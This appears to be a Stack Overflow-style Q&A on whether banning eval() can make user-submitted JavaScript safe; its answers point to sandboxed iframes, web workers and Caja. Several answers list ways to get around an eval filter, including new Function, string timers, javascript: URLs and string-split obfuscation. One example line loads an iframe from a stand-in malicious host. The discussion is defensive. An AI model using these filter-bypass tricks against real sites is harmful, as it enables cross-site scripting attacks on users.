# How can I make external code 'safe' to run? Just ban eval()?

Tags: javascript, security, xss

I'd like to be able to allow community members to supply their own javascript code for others to use, because the users' imaginations are collectively far greater than anything I could think of.

But this raises the inherent question of security, particularly when the purpose is to *allow* external code to run.

So, can I just ban `eval()` from submissions and be done with it? Or are there other ways to  evaluate code or cause mass panic in javascript?

There are other things to disallow, but my main concern is that unless I can prevent strings being executed, whatever other filters I put in for specific methods can be circumvented. Doable, or do I have to resort to demanding the author supplies a web service interface?

Answer (score 9, accepted):

> Or are there other ways to evaluate code

You can't filter out calls to `eval()` at a script-parsing level because JavaScript is a Turing-complete language in which it is possible to obfuscate calls. eg. see svinto's workaround. You could hide `window.eval` by overwriting it with a null value, but there are indeed other ways to evaluate code, including (just off the top of my head):

- new Function('code')()
- document.write('%3Cscript>code%3C/script>')
- document.createElement('script').appendChild(document.createTextNode('code'))
- window.setTimeout('code', 0);
- window.open(...).eval('code')
- location.href='javascript:code'
- in IE, style/node.setExpression('someproperty', 'code')
- in some browsers, node.onsomeevent= 'code';
- in older browsers, Object.prototype.eval('code')

> or cause mass panic in javascript?

Well createElement('iframe').src='http​://evil.iframeexploitz.ru/aff=2345' is one of the worse attacks you can expect... but really, when a script has control, it can do anything a user can on your site. It can make them post “I'm a big old paedophile!” a thousand times on your forums and then delete their own account. For example.

> do I have to resort to demanding the author supplies a web service interface?

Yes, or:

- do nothing and let users who want this functionality download GreaseMonkey
- vet every script submission yourself
- use your own (potentially JavaScript-like) mini-language over which you actually have control

an example of the latter that may interest you is [Google Caja](http://code.google.com/p/google-caja/). I'm not entirely sure I'd trust it; it's a hard job and they've certainly had some security holes so far, but it's about the best there is if you really must take this approach.

Answer (score 14):

Since [HTML5](http://en.wikipedia.org/wiki/HTML5) has now become available you can use a [sandbox](http://www.html5rocks.com/en/tutorials/security/sandboxed-iframes/) for untrusted JavaScript code.

The [OWASP HTML5 Security Cheat Sheet](https://www.owasp.org/index.php/HTML5_Security_Cheat_Sheet) comments on [Sandboxed frames](https://www.owasp.org/index.php/HTML5_Security_Cheat_Sheet#Sandboxed_frames):

> - Use the sandbox attribute of an iframe for untrusted content.
> - The sandbox attribute of an iframe enables restrictions on content within a `iframe`. The following restrictions are active when the sandbox attribute is set:
>
>   1. All markup is treated as being from a unique origin.
>   2. All forms and scripts are disabled.
>   3. All links are prevented from targeting other browsing contexts.
>   4. All features that triggers automatically are blocked.
>   5. All plugins are disabled.
>
>      It is possible to have a fine-grained control over `iframe` capabilities using the value of the `sandbox` attribute.
> - In old versions of user agents where this feature is not supported, this attribute will be ignored. Use this feature as an additional layer of protection or check if the browser supports sandboxed frames and only show the untrusted content if supported.
> - Apart from this attribute, to prevent Clickjacking attacks and unsolicited framing it is encouraged to use the header `X-Frame-Options` which supports the `deny` and `same-origin` values. Other solutions like framebusting `if(window!== window.top) { window.top.location = location; }` are not recommended.

You can allow scripts to run while keeping the other restrictions in place. However, you should make sure that scripts run from a different domain than your main content in order to prevent [XSS](https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)) attacks by an attacker redirecting a user to load the page directly (i.e. not via your IFrame).

This will restrict scripts from using `eval` to attack your main domain, but it may be that this would also prevent the scripts from actually being powerful enough for your needs. Any interaction with your main domain would have to be via [`Window.postMessage`](https://developer.mozilla.org/en-US/docs/Web/API/Window.postMessage). If this is too restrictive then [@bobince's answer](https://stackoverflow.com/a/739937/413180) still has the best suggestions for workarounds.

Please see [my other answer](https://stackoverflow.com/a/21244925/413180) for details of how a sandbox can be safely implemented.

Answer (score 5):

There really isn't any way that allowing arbitrary Javascript execution can be safe. Realistically, any sort of filtration you provide to prevent malicious code would strip out legitimate code that accesses similar functions or data. I don't think that what you're looking to do is feasible in this way.

Comment: There is a long history of security work on taking languages with unbounded authority and "taming" them to be more safe.  See the Joe-E language and the Caja language mentioned above.

Answer (score 2):

You need to execute the untrusted code in a sandboxed environment. This means creating an iframe with the `sandbox` attribute (see [this article](http://www.html5rocks.com/en/tutorials/security/sandboxed-iframes/)), and additionally create a web-worker inside that frame (so that the code runs in a separate thread and does not hang up the UI in case if user has submitted something strange).

If you need to interact somehow with the code sandboxed in the described way, the [messaging mechanism](https://developer.mozilla.org/en-US/docs/Web/API/Window.postMessage) can be used. This is a bit tricky, but there are some libraries simplifying the task, including one created by myself: https://github.com/asvd/jailed

Answer (score 1):

No, you practically can't prevent user provided Javascript code to run whatever it wants - even disallowing `eval()` can't prevent it to run arbitrary programs (it could be a Javascript interpreter itself, in which case it just implements the `eval()` function, and many other ways - eg. it can add HTML with some event handlers in string form, then execute them, it can `document.write()` a new script etc.).

If your site doesn't need this user supplied JS to run on other users' computers, I'd just put a big fat warning, add some human control (that could flag rogue code as such), maybe some antivirus software on the server (don't know much about that).

Comment: Warnings don't help users make informed decision.  They just pass the buck.

Answer (score 0):

Filtering out eval probably doesn't work. I imagine that you could hack round it like this: `window['ev' + 'al']('alert("hello world");');`. You could of course replace the eval function...